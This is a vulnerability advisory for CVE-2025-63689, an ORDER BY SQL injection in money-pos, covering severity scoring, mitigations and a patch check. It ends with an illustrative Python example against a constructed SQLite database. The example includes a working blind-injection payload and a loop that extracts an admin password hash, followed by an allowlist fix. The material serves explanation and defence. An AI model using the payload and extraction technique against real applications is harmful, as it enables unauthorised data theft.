CVE-2025-63689
Published: 07 November 2025
Summary
CVE-2025-63689 is a critical-severity SQL injection (CWE-89) vulnerability in ycf1998 money-pos. Its CVSS v3.1 base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 42.7% of CVEs by exploit likelihood, is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2025-63689 covers multiple SQL injection vulnerabilities (CWE-89) in the ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14). The injection point is the orderby parameter. A sort parameter of this kind ends up in the ORDER BY clause, a position that bind parameters cannot protect because column names and sort expressions are not bindable values, so whatever expression the attacker supplies is evaluated by the database and the correct fix is an allowlist of sort columns rather than escaping. The record describes the outcome as arbitrary code execution; at minimum the attacker runs arbitrary SQL in the application's database context, and whether that extends to execution on the host depends on the DBMS and on the privileges of the application's database account. The vulnerability carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H): network accessible, low attack complexity, no privileges or user interaction required, a scope change, and high impact on confidentiality, integrity, and availability.
Any unauthenticated remote attacker can exploit this vulnerability over the network with minimal effort. Successful exploitation hands the attacker control over the SQL the application executes, which the record rates as arbitrary code execution; depending on the database's configuration and the account's privileges this can lead to full server compromise, data exfiltration, or lateral movement within the environment.
Mitigation is available via the fixing commit at https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59. Additional details, including a proof-of-concept, are documented in the GitHub issue at https://github.com/ycf1998/money-pos/issues/3 and a related gist at https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46. Because the fix is identified by a commit rather than a tagged release, confirm that each deployed checkout actually contains it (git merge-base --is-ancestor 11f276bd20a41f089298d804e43cb1c39d041e59 HEAD exits 0 when it does), and rebuild and redeploy immediately where it does not.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-38273
Vulnerability details
Multiple SQL injection vulnerabilities in the ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allow a remote attacker to execute arbitrary code via the orderby parameter.
- CWE(s): CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1190: Exploit Public-Facing Application
Why these techniques?
The SQL injection vulnerability in a public-facing web application (money-pos system) allows unauthenticated remote attackers to achieve arbitrary code execution, directly mapping to T1190: Exploit Public-Facing Application.
Mitigating Controls (NIST 800-53 r5)
SI-10 (Information Input Validation) addresses the root cause: untrusted input such as the orderby parameter must be validated before it reaches the query. For a sort parameter that means checking the value against an allowlist of permitted column names and sort directions and rejecting everything else, because the ORDER BY position cannot be parameterised and escaping does not protect it.
SI-2 mandates timely identification, reporting, and patching of flaws such as the SQL injection issues fixed in the specified commit.
SC-7 (Boundary Protection) allows boundary devices such as web application firewalls to inspect and block known SQL injection payloads aimed at the orderby parameter. Treat this as a compensating control while the patch is rolled out: signature-based filtering of sort expressions is routinely bypassed and does not remove the flaw.
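To make both the mechanism in the deeper analysis and the SI-10 validation concrete, here is an added example (not code from the money-pos project, whose internals the record does not show). It pastes an orderby value into ORDER BY the way a vulnerable endpoint would, shows a boolean-based blind extraction that needs nothing but the resulting row order, and then the allowlist validation that closes the hole. The SQLite schema, the orders and app_users tables, the admin row, and the allowed column set are assumptions constructed for illustration.

```python
"""
Added example, not code from the money-pos project: why an unvalidated
`orderby` parameter is a SQL injection sink even though ORDER BY cannot take a
bound parameter, and the allowlist validation that NIST SI-10 calls for.
The SQLite schema, table and column names are assumptions for illustration.
"""
import sqlite3
import string

# Assumption: the columns a caller is allowed to sort by.
ALLOWED_SORT_COLUMNS = {"id", "total", "created_at"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three orders plus a table the orders endpoint
    has no business reading."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL, created_at TEXT);
        INSERT INTO orders VALUES (1, 12.50, '2025-09-01'),
                                  (2, 99.99, '2025-09-02'),
                                  (3, 3.25,  '2025-09-03');
        CREATE TABLE app_users (username TEXT, password_hash TEXT);
        INSERT INTO app_users VALUES ('admin', 'constructed-hash-value');
        """
    )
    return conn


def list_orders_vulnerable(conn: sqlite3.Connection, orderby: str) -> list:
    """The anti-pattern: the caller's sort expression is pasted into the
    statement. There is no bind parameter for this position, which is why
    developers reach for string formatting here."""
    sql = f"SELECT id, total FROM orders ORDER BY {orderby}"
    return conn.execute(sql).fetchall()


def order_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind injection through ORDER BY: when `condition` is
    true the rows sort by id (first id is 1), otherwise by total (first id
    is 3). The response never contains the secret, only the row order, but
    that single bit per request is enough."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE total END)"
    rows = list_orders_vulnerable(conn, payload)
    return rows[0][0] == 1


def extract_secret(conn: sqlite3.Connection, max_len: int = 8) -> str:
    """Recover the admin password hash one character at a time through the
    ordering oracle. The alphabet is kept small to suit the constructed data."""
    alphabet = string.ascii_lowercase + string.digits + "-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (
                "(SELECT substr(password_hash, %d, 1) FROM app_users "
                "WHERE username = 'admin') = '%s'" % (pos, ch)
            )
            if order_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered


def list_orders_safe(conn: sqlite3.Connection, orderby: str) -> list:
    """SI-10 style validation: accept only an allowlisted column and
    direction and reject everything else before any SQL is built. Only
    allowlist members ever reach the statement, never free-form user text."""
    parts = orderby.split()
    if len(parts) not in (1, 2):
        raise ValueError(f"rejected orderby value: {orderby!r}")
    column = parts[0]
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_SORT_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected orderby value: {orderby!r}")
    sql = f"SELECT id, total FROM orders ORDER BY {column} {direction}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("benign :", list_orders_vulnerable(db, "total"))
    print("leaked :", extract_secret(db, max_len=30))
    try:
        list_orders_safe(db, "(CASE WHEN 1=1 THEN id ELSE total END)")
    except ValueError as err:
        print("blocked:", err)
```

The point of the oracle is that an ORDER BY injection does not need error messages, UNION, or stacked queries: a subquery inside a CASE expression turns any condition the attacker can write into an observable change in row order, so anything the application's database account can read leaks at a few requests per character. The safe variant works because the only strings that reach the statement are members of the allowlist; it deliberately does not try to escape or sanitise the raw value, since there is no escaping rule that makes an arbitrary expression safe in that position.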